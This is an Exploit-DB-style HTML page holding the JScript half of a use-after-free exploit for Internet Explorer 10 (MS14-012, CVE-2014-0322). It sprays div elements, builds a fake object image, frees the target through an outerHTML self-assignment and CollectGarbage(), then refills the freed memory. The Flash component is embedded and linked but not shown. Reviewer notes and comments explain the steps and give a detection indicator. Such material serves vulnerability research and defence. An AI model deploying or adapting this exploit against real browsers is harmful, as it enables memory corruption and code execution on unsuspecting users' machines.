<!--
MS14-012 Internet Explorer CMarkup Use-After-Free
Vendor Homepage: http://www.microsoft.com
Version: IE 10
Date: 2014-03-31

Exploit Author: Jean-Jamil Khalife
Tested on: Windows 7 SP1 x64 (fr, en)
Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)
Home: http://www.hdwsec.fr
Blog : http://www.hdwsec.fr/blog/

MS14-012 / CVE-2014-0322

Generation:
c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf

Exploit-DB Mirror:https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32851-AsXploit.as

Reviewer notes (defensive context):
- The script below is only the JScript half of the exploit; the Flash half
  (AsXploit.swf, embedded at the bottom) is not on this page.
- Nothing on this page calls trigger(); it is presumably invoked from the
  embedded SWF - confirm against the ActionScript source linked above.
- The underlying bug was fixed by the MS14-012 update named in the title;
  the page documents the vulnerable IE 10 / Flash 12 combination only.
-->
<html>
<head>
</head>
<body>
<script>
// Spray targets: arrLen <div> elements whose .title strings are later used to
// reoccupy the freed allocation (see eXpl()).
var g_arr = [];
var arrLen = 0x250;

// Encodes a 32-bit value as a 2-character string of UTF-16 code units,
// low 16-bit half first (little-endian word order).
// dword: integer in 0..0xffffffff; it is zero-padded to 8 hex digits.
// Returns a string of length 2.
function dword2data(dword)
{
    var d = Number(dword).toString(16);
    while (d.length < 8)
        d = '0' + d;
    // substr(4, 8) is the low word, substr(0, 4) the high word.
    return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
}

// onpropertychange handler installed by trigger(); `this` is therefore the
// <script> element whose property changed. Performs the use-after-free:
// builds a fake object image, frees the vulnerable object (page comment:
// "trigger"), forces a GC, then refills the freed memory with copies of the
// fake object.
function eXpl()
{
    var a=0;
    for (a=0; a < arrLen; a++)
    {
        g_arr[a] = document.createElement('div');
    }

    // Build a new object
    // Each dword2data() call appends two UTF-16 code units, so b.length counts
    // 16-bit units and the comparisons below use byte offsets divided by two.
    // The asm comments name the instructions that read each crafted field;
    // 0x42424242 is a recognizable marker value, the rest is filler.
    var b = dword2data(0x19fffff3);
    while (b.length < 0x360)
    {
        // mov eax,dword ptr [esi+98h]
        // ...
        // mov eax,dword ptr [eax+8]
        // and dword ptr [eax+2F0h],0FFFFFFBFh
        if (b.length == (0x98 / 2))
        {
            b += dword2data(0x1a000010);
        }
        // mov ecx,dword ptr [edx+94h]
        // mov eax,dword ptr [ecx+0Ch]
        else if (b.length == (0x94 / 2))
        {
            b += dword2data(0x1a111111);
        }
        // mov eax,dword ptr [edx+15Ch]
        // mov ecx,dword ptr [eax+edx*8]
        else if (b.length == (0x15c / 2))
        {
            b += dword2data(0x42424242);
        }
        else
        {
            b += dword2data(0x19fffff3);
        }
    }

    // Truncate to the target allocation size (0x340 bytes); the "- 2" presumably
    // leaves room for the string terminator - TODO confirm.
    var d = b.substring(0, ( 0x340 - 2 )/2);

    // trigger
    // Self-assignment of outerHTML is done purely for its side effect; any
    // exception is intentionally ignored.
    try{ this.outerHTML=this.outerHTML }
    catch(e){ }
    // IE-only JScript call that runs the garbage collector immediately.
    // Detection note: explicit CollectGarbage() in web content is rare outside
    // IE use-after-free exploits and is a useful static indicator.
    CollectGarbage();

    // Replace freed object
    // d.substring(0, d.length) is presumably used to get one distinct string
    // allocation per element rather than sharing a single string.
    for (a=0; a < arrLen; a++)
    {
        g_arr[a].title = d.substring(0, d.length);
    }
}

// Trigger the vulnerability
// Not called from this page (see header notes). Registers eXpl as the
// onpropertychange handler of the first <script> element, then appends a
// child <SELECT> to it - presumably the property change that fires eXpl.
function trigger()
{
    var a = document.getElementsByTagName("script");
    var b = a[0];
    b.onpropertychange = eXpl;
    var c = document.createElement('SELECT');
    c = b.appendChild(c);
}
</script>
<!-- Flash component of the exploit (source at the Exploit-DB mirror in the
     header); its contents are not on this page. -->
<embed src=AsXploit.swf width="10" height="10"></embed>
</body>
</html>